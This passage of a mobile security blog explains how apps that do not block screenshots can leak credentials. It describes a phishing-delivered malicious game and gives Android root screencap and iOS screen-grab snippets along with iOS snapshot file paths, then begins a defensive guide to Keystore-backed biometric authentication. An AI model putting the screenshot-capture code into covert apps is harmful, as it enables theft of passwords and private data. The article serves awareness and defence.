0px 0px 0px 40px; padding: 0px; text-align: left;"><div><span><div><div><b>- The attacker has planted a foreground running malware on the targeted device</b>: let’s assume that the attacker has delivered a malicious application on the victim’s device by uploading a compromised application on the store or by getting the victim to download an application from an untrusted source and the target device has modified status that can allow the attacker to read files outside of the application sandbox. In this scenario the attacker would be able to access system generated screenshots that may contain sensitive information and can then exfiltrate these files through the network.</div></div></span></div></blockquote><p> </p><div><span><div><div><h2 style="text-align: left;">Risks</h2></div></div><div>The main risk related to this kind of vulnerability is sensitive information stealing.</div><div>Any information shown on the device display can be stolen if not explicitly protected.</div><div><br /></div><div>So if an application is displaying private information in any of its views, it must be protected.</div><div><br /></div><div><div>An attacker can use automated OCR (Optical Character Recognition) analyzers in order to automatically process the gathered screenshots and extract any information contained therein.</div><div><br /></div><div>Any extracted information can then be then exfiltrated to an attacker controlled target in several possible ways, which would not be covered by this article.</div><div><br /></div><div><br /></div><div>The following list is just an example of which kind of data can be stolen:</div></div><div><br /></div></span></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><span><ul style="text-align: left;"><li><span><div><div>- <b>Passwords</b></div></div></span></li><li><span><div><div>- <b>PII</b> (Personal Identifiable Information)</div></div></span></li><li><span><div>- <b>PHI</b> (Personal Healthcare Information)</div></span></li><li><span><div>- <b>Private data </b>such as appointments, notes, etc.</div></span></li><li><span><div>- <b>Contacts</b></div></span></li><li><span><div>- <b>Email and message contents</b></div></span></li><li><span><div>- [...]<br /></div></span></li></ul></span></blockquote><div><span><div><br /></div><div><h2 style="text-align: left;">Real world: a concrete attack</h2></div><div>As already stated, there are two kinds of approaches an attacker can use, based on how his device is accessed. Both of them will be explained in the following paragraphs.</div><div><br /></div><div>In both scenarios, we will assume that the Bill, the victim, is using the <i>SuperSecureMail</i> application. Bill resets his password, and the <i>SuperSecureMail</i> application generates a set of temporary credentials, showing them on the screen so that Bill will be able to copy them and access back to his mail account.</div><div><br /></div><h4 style="text-align: left;">Scenario 1: The attacker has physical access to victim’s device</h4><div>Bill is in his office, and he has just generated temporary credentials in his <i>SuperSecureMail</i> application. Now, since the application has generated a complex and strong password, Bill wants to write them on a piece of paper in order to later perform a login to his mailbox, but unfortunately he ran out of paper, so he decides to go to the office next door in order to borrow some. Doing this, Bill leaves his mobile device unlocked on his desk.</div><div><div><br /></div><div>At this point the attacker can pick Bill’s device, and he can see the credentials on the screen. He has a little time before Bill’s return, so he decides to pick a screenshot of what is on the screen using the key combination that is specific to that device and then he sends himself the generated screenshot over a Bluetooth connection.</div><div><br /></div><div>Since the application was <u><b>not implementing any screenshotting countermeasure</b>,</u> the attacker now has a screenshot containing Bill’s credentials on its device and he can use the obtained information to access Bill’s mailbox and/or perform further attacks.</div></div><div><br /></div><h4 style="text-align: left;">Scenario 2: The attacker has access to victim’s device through a malware</h4><div><div>This scenario is a bit more complex than the previous one since the attacker needs to plant a malware to Bill’s device before starting the attack, moreover Bill has a device which is running a mobile operating system which implements a permissive access control policy and allows processes to perform privileged operations (e.g. the device is rooted or jailbroken).</div><div><br /></div><div>There are many ways an attacker could use in order to trick Bill to install an attacker controlled malware. In this case the attacker knows that Bill loves to play with mobile games which are full of cute kittens.</div><div>Using this information, the attacker creates a real mobile game with the desired look but he also inserts malicious pieces of code into the application. These pieces of code will run in a specific mode in order to retrieve system generated screenshots of any mobile application installed on Bill’s device. </div><div><br /></div><div>After generating this mobile game, the attacker sends an email to Bill saying “<i>Hey Bill, attached there is a mobile game that we think you would love! It is a preview and we care about your opinion, so it is free at this time but it is only for you</i>!”.</div><div><br /></div><div>Bill loves cute kittens. </div><div><br /></div><div>Bill installs the game and gets infected unknowingly by the attacker’s malware.</div><div><br /></div><div>At this point, as in the previous scenario Bill has just generated temporary credentials in his <i>SuperSecureMail</i> application. Now, since the application has generated a complex and strong password Bill copies this password on the Notes application of his device.</div><div><br /></div><div>Now, when Bill switches between the <i>SuperSecureMail</i> application and the Notes application, while bringing the <i>SuperSecureMail</i> application to the background the mobile operating system generates a screenshot of what the application is displaying in that moment. </div><div>The screenshot is a standard image that will be shown in the device’s task manager and that will be stored in a specific path on the device’s file system that varies based on the operating system version.</div><div><br /></div><div>Finally, the malware can scan the file system searching for operating system generated screenshots. When it finds them, it would be possible to exfiltrate these images to an attacker controlled domain where the data can be processed and the contained sensitive information can be extracted.</div><div><br /></div><div>It must be noted that the aforementioned scenarios are <i><u>only two</u></i> of many kind of attacks that may take an attacker to exploit this kind of vulnerability. However they are two really common scenarios that can happen in the real world.</div></div><div><br /></div><h2 style="text-align: left;">How to do this? Let's see the code!</h2><div>The following sample of code[1] is showing how is it possible to generate a screenshot from an <b>Android</b> background service, using superuser’s privileges:</div><div><br /></div><div><div><span style="font-family: courier;"></span></div></div><blockquote><div><div><span style="background-color: #f3f3f3; font-family: courier;">Process sh = Runtime.getRuntime().exec("su", null,null); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">OutputStream os = sh.getOutputStream(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.write(("/system/bin/screencap -p " + "/sdcard/img.png").getBytes("ASCII")); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.flush(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">os.close(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">sh.waitFor();</span></div><div><span style="background-color: #f3f3f3; font-family: courier;"><br /></span></div><div><span style="background-color: #f3f3f3; font-family: courier;">Bitmap screen = BitmapFactory.decodeFile(Environment.getExternalStorageDirectory()+ File.separator +"img.png");</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">ByteArrayOutputStream bytes = new ByteArrayOutputStream(); screen.compress(Bitmap.CompressFormat.JPEG, 15, bytes); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">File f = new File(Environment.getExternalStorageDirectory()+ File.separator + "test.jpg"); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">f.createNewFile(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">FileOutputStream fo = new FileOutputStream(f); fo.write(bytes.toByteArray());</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">FileOutput fo.close();</span></div></div><div></div></blockquote><div><br /></div><div>In a similar way the following example of <b>iOS</b> code [2] can be used in a Mobile Substrate module, running in a jailbroken device, to generate a screenshot of any application:</div><div><br /></div><div><div><span style="background-color: #f3f3f3;"><span style="font-family: courier;"></span></span></div><blockquote><div><span style="background-color: #f3f3f3; font-family: courier;">UIKIT_EXTERN CGImageRef UIGetScreenImage();</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">CGImageRef ref = UIGetScreenImage(); </span></div><div><span style="background-color: #f3f3f3; font-family: courier;">UIImage* img = [UIImage imageWithCGImage:ref];</span></div><div><span style="background-color: #f3f3f3; font-family: courier;">CGImageRelease(ref);</span></div></blockquote><div><span style="background-color: #eeeeee;"><span style="font-family: courier;"></span></span></div></div><div><br /></div><div><br /></div><div><div>The following library developed by Google can be used to generate screenshots from an <b>Android background service</b> without having access to superuser’s privileges:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>https://code.google.com/archive/p/android-screenshot-library/</div></div></span></li></ul></div></div><div><div>In a similar way, if the attacker is targeting <b>Android versions 21+,</b> the following native framework can be used in order to achieve the same result, getting a screenshot generated on a standard device:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>https://developer.android.com/reference/android/media/projection/MediaProjection</div></div></span></li></ul></div></div><h4 style="text-align: left;">Example - 1: accessing system generated screenshots</h4><div>In this paragraph is shown how an attacker can access system generated screenshots for the Safari application.</div><div>For this example, the Safari application has been opened and then it has been put on the background. This action resulted in the following image being shown in the <i>iOS</i> task manager:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUKHbNLNJTtDHpqZyNn0NmGWhTIJX6JCxe6Zvz0eo5d7Y2uDRl1GWd_WpHJk0cAb2N8ITrNJ8vuv28FOxo0Ms7bTVSsYOO8wmW4yQ-IFCSk8PXsAOq-KrS-s4W-EoNpi1u4NzuBG9m72k/s1334/IMG_0036.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUKHbNLNJTtDHpqZyNn0NmGWhTIJX6JCxe6Zvz0eo5d7Y2uDRl1GWd_WpHJk0cAb2N8ITrNJ8vuv28FOxo0Ms7bTVSsYOO8wmW4yQ-IFCSk8PXsAOq-KrS-s4W-EoNpi1u4NzuBG9m72k/s320/IMG_0036.PNG" /></a></div><br /><div><br /></div><div>System generated screenshots are located at the following location on <b>iOS 12:</b></div><div><span style="font-family: courier;"><blockquote style="background-color: #f3f3f3;"><blockquote>/var/mobile/Containers/Data/Application/{APPLICATION_BUNDLE_ID}/Library/Caches/Snapshots/{APPLICATION_PACKAGE_NAME}</blockquote></blockquote></span></div><div><br /></div><div><div>For example, in this case, Safari system generated screenshots are located at the following location:</div><div><span style="font-family: courier;"><blockquote style="background-color: #f3f3f3;"><blockquote>/var/mobile/Containers/Data/Application/B9008870-3F72-4B0E-ADEC-D867FBA060A2/Library/Caches/Snapshots/com.apple.mobilesafari</blockquote></blockquote></span></div></div><div><br /></div><div>The following screenshot is showing the content of the above folder:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXDe6yMNOmk_zwwn-kx87xhvPfKDeB8jEPf-0_C1Pp5kpToEOrwvzNqVFpe6w2iugDpfBHMrtelW6DwUKORdu80UUj3NQc9uQ-uHQM9k3NkRj6CmYDB0fAWaTqcNTy2LLFaC2qMQhEBl8/s1334/IMG_0037.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXDe6yMNOmk_zwwn-kx87xhvPfKDeB8jEPf-0_C1Pp5kpToEOrwvzNqVFpe6w2iugDpfBHMrtelW6DwUKORdu80UUj3NQc9uQ-uHQM9k3NkRj6CmYDB0fAWaTqcNTy2LLFaC2qMQhEBl8/s320/IMG_0037.PNG" /></a></div><br /><div><br /></div><div>Finally, opening the file named <i>E341AE9B-B12A-4E8B-AB08-1DA156CDF9E2@2x.ktx</i> we can see that the content is the screenshot that was shown in the <b>iOS</b> task manager shown before:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAr1t5GEnSqyA6QewOFMJLTX2kz6TZtb1WGkV0JfOoFeWu25N_FcD6lQT5tT8GHUdPHRH9kS66OerQudgerB8RKK2lXbFvgOSgz3MXdHc5f-A9qAhR07Zo3c_7IP59Gxax7KjLcgmzCkI/s1334/IMG_0038.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAr1t5GEnSqyA6QewOFMJLTX2kz6TZtb1WGkV0JfOoFeWu25N_FcD6lQT5tT8GHUdPHRH9kS66OerQudgerB8RKK2lXbFvgOSgz3MXdHc5f-A9qAhR07Zo3c_7IP59Gxax7KjLcgmzCkI/s320/IMG_0038.PNG" /></a></div><br /><h4 style="text-align: left;">Example - 2: accessing user generated screenshots</h4><div><div>In a similar way, user generated screenshots can be accessed from any application which the permission to access the device photo library was granted.</div><div>In this example, we are explicitly generating a screenshot of the Safari application.</div></div><div><br /></div><div>User generated screenshots can be found at the following location in iOS12:</div><div><span style="font-family: courier;"><blockquote style="background-color: #f3f3f3;"><blockquote>/var/mobile/Media/DCIM/100APPLE/</blockquote></blockquote></span></div><div><br /></div><div>Accessing this location, and opening the file named IMG_0039.PNG we can finally access the previously generated screenshot:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVH6mDlDqyoGDNBlmsuLzchyphenhyphen1Rgo_G2LNZxwUjWlYihMPC0Qaq8g9P11hV3-yIh1XD1hZEJhcWYS5iDxlG7Ku8GMebQHA6jnh9C6bm6looT4r7WC19_SVF0dbZtZl2iCuxwZ0p6G0Qa-8/s1334/IMG_0039.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1334" data-original-width="750" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVH6mDlDqyoGDNBlmsuLzchyphenhyphen1Rgo_G2LNZxwUjWlYihMPC0Qaq8g9P11hV3-yIh1XD1hZEJhcWYS5iDxlG7Ku8GMebQHA6jnh9C6bm6looT4r7WC19_SVF0dbZtZl2iCuxwZ0p6G0Qa-8/s320/IMG_0039.PNG" /></a></div><br /><div><br /></div><h2 style="text-align: left;">Conclusions and next steps</h2><div><div>This article analyzed which risks and scenarios are afflicting mobile applications which are not explicitly implementing mobile screenshotting prevention, trying to clearly explain what an attacker can do in order to gather personal data and sensitive information.</div><div><br /></div><div>What can a user do in order to prevent sensitive data from being stolen leveraging this kind of attack? </div><div><br /></div><div>It must be noted that the user by itself can not totally prevent these types of attacks, but he can mitigate them by using the following best practices:</div><div><ul style="text-align: left;"><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not let people to have unauthorized physical access to the device</div></div></span></li><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not install any application coming from a untrusted sources such as email attachments, unofficial application stores or any other source available on the web.</div></div></span></li><li><span id="docs-internal-guid-c9213e6f-7fff-1585-2779-19cb0ca1b52f"><div><div>Do not modify the device and operating system statuses by using procedures such as rooting, jailbreaking or installing modified versions of the mobile operating system.</div></div></span></li></ul></div><div><br /></div><div>The next question would be: how can a mobile application be checked if it implements Mobile Screenshot countermeasures? How can this issue be fixed?</div><div><br /></div><div>These topics will be covered in one of the next blog posts with the title: “<b>Mobile Screenshot Prevention Cheat Sheet - Testing and Fixing</b>”.</div></div><div><br /></div><span><a name='more'></a></span><div><br /></div><div><div>References: </div><div>[1] <a href="https://stackoverflow.com/questions/8779700/screenshot-from-background-service-of-another-application-programmatically">https://stackoverflow.com/questions/8779700/screenshot-from-background-service-of-another-application-programmatically</a></div><div>[2] <a href="https://stackoverflow.com/questions/9746711/programmatically-take-screenshots-on-ios-from-anywhere">https://stackoverflow.com/questions/9746711/programmatically-take-screenshots-on-ios-from-anywhere</a></div></div><div><br /></div></span></div>
Martino Lessiohttp://www.blogger.com/profile/15529162337412441148noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-72451932148016156972020-07-30T01:20:00.000-07:002020-07-30T01:20:23.919-07:00Implementing Secure Biometric Authentication on Mobile Applications<h3 style="text-align: left;"><br /></h3>
<div style="text-align: justify;">
Nowadays, almost every mobile device has a biometric sensor that allows
developers to implement local authentication and also store sensitive data
securely through dedicated APIs.
</div>
<div style="text-align: justify;">
Biometric authentication is generally more secure than classic
username/password approach. Anyway it must be considered that a wrong
implementation could allow an attacker to easily bypass authentication
mechanisms by using hooking techniques which can be performed with tools like
Frida, Objection, and other similar utilities.
</div>
<div style="text-align: justify;"><br /></div>
<div style="text-align: justify;">
In this article we are going to expose some common mistakes that developers can make while implementing biometric authentication and how to implement it in the correct
way.
</div>
<div style="text-align: justify;"><br /></div>
<div><br /></div>
<h3 style="text-align: left;">Biometric Authentication in Android</h3>
<div>
<div style="text-align: justify;">
<div>
The Android platform introduced the biometric authentication in Android
6.0 (API level 23) with the class <i>FingerprintManager</i> which
supported only fingerprint authentication.
</div>
<div>
In Android 9 (API level 28), the <i>FingerprintManager</i> was deprecated
due to the release of <i>android.hardware.biometrics.BiometricPrompt</i>.
</div>
<div>
Lastly, In Android 10 (API level 29) the biometric authentication is
managed through <i>android.hardware.biometrics.BiometricManager</i>.
</div>
<div><br /></div>
<div>
It is worth considering that the Android platform introduces also the classes
<i>androidx.biometric.BiometricManager</i> and
<i>androidx.biometric.BiometricPrompt</i> that could be used instead of
the previous ones. These classes will automatically query the <i>BiometricManager</i>
on devices running Android 10 (API 29) and
<i>FingerprintManagerCompat</i> on Android 9.0 (API 28) and prior
versions.
</div>
<div><br /></div>
<div>
The Android platform, unlike iOS, does not allow to save arbitrary data
within Keystore. However, it allows to create encryption keys, which are
saved in the <i>Keystore</i>. For every key it is possible to define the
access criteria.
</div>
<div>
In order to implement effective biometric authentication, it is therefore
necessary to create a key that can be used only after a successful
biometric authentication. This key should be used to encrypt and decrypt a
sensitive data such as an authentication token.
</div>
<div><br /></div>
<div>
<span id="docs-internal-guid-1f10d6c9-7fff-1cbf-f296-cc86ccaf1c1d"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">In order to use the biometric authentication all of the following requirements must be fulfilled:</span></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">1) <b>Require </b></span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;"><b>the proper permission in the Android Manifest</b>:</span>
</div>
<div>
<font face="arial"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></font>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<uses-permission
android:name="android.permission.USE_FINGERPRINT" />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<uses-permission android:name="android.permission.USE_BIOMETRIC"
/>
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><br /></div>
</div>
<div></div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">2) <b>Check if the user can authenticate using biometrics:</b>
</span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">This includes having a protected lock screen enabled, a biometric hardware available and a biometric identity registered (For instance a fingerprint). The following piece of code shows a sample implementation:</span>
</div>
<div>
<br />
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
import androidx.biometric.BiometricManager;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
. . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
BiometricManager biometricManager = BiometricManager.from(this);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
switch (biometricManager.canAuthenticate()) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_SUCCESS:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// User can authenticate using
biometrics
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// No biometric features available on
this device
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// Biometric features are currently
unavailable
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
case BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED:
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// The user hasn't associated any
biometric credentials with their account
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
break;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div><br /></div>
<div>
3) <span id="docs-internal-guid-70e8482c-7fff-4845-fe90-0a339f365492"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><b>Check if the application has the correct permissions</b>:</span></span>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
context.checkSelfPermission(Manifest.permission.USE_FINGERPRINT)
== PermissionResult.PERMISSION_GRANTED;
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
context.checkSelfPermission(Manifest.permission.USE_BIOMETRIC) ==
PermissionResult.PERMISSION_GRANTED;
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-026837ee-7fff-ec6b-901e-f36d156cc0d0"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The most important methods which must be used in order to implement the biometric authentication in Android are the following ones:</span>
</p>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1) <b>authenticate</b> </span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">(which starts the authentication flow):</span>
</div>
<div><br /></div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
biometricPrompt.authenticate(promptInfo, new
BiometricPrompt.CryptoObject(cipher));
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2) </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">onAuthenticationSucceeded </span><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">(which is called upon a successful authentication):</span>
</div>
</div></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
</div>
<div>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@Override
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
public void onAuthenticationSucceeded(
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
@NonNull
BiometricPrompt.AuthenticationResult result) {
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
// . . . .
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
}
</div>
<div><br /></div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<span id="docs-internal-guid-ba2e7268-7fff-8ce9-e786-e329fd143786"><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The cipher referred in the first parameter of the <i>authenticate</i> method should be used in order to decrypt a secret data which has been previously stored in the device. Such cipher can use both asymmetric and symmetric algorithm.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">I</span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">n the following example we are going to create a key for a cipher which </span><span style="font-family: arial; font-size: 11pt; white-space: pre-wrap;">uses AES-CBC-PKCS7.</span></p>
<div dir="ltr" style="background: rgb(242, 242, 242); border: 1px solid rgb(140, 140, 140); line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 5px;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyGenerator keyGenerator =
KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES,
“AndroidKeyStore”);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyGenerator.init(new KeyGenParameterSpec.Builder
(KEY_ALIAS,
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
KeyProperties.PURPOSE_ENCRYPT |
KeyProperties.PURPOSE_DECRYPT)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setBlockModes(KeyProperties.BLOCK_MODE_CBC)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_PKCS7)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setUserAuthenticationRequired(true)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setUserAuthenticationValidityDurationSeconds(-1)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.setInvalidatedByBiometricEnrollment(true)
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
.build()
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
);
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
keyGenerator.generateKey();
</div>
</div>
</div>
<span id="docs-internal-guid-ddccb4dc-7fff-15a0-f809-26357e11d383"></span><br />
<div>
<br />
<span id="docs-internal-guid-c9559110-7fff-b907-de8d-eab6f4ef889a"><span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">When creating the key for the cipher that will be used in the biometric authentication flow, the most important options are the following ones:</span></span>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div></span>
</div>
</div>
<div>
<span style="font-family: arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1) </span><span style="font-family: arial; font-size: 14.6667px; white-space: pre-wrap;"><b>setUserAuthenticationRequired(true)</b>: available from API level 23, when set to true, the key can be used only if the user has been authenticated. Additionally, the key will become irreversibly invalidated once the secure lock screen is disabled, or when the secure lock screen is forcibly reset. </span>
</div><div><br /></div>
<div>
<span style="font-size: 14.6667px; white-space: pre-wrap;"><font face="arial">2) <b>setUserAuthenticationValidityDurationSeconds(-1)</b>: available from API level 23, when set to -1 the key can only be unlocked using a biometric identity. If it is set to a different value, the key can be unlocked using a device screenlock too.</font></span>
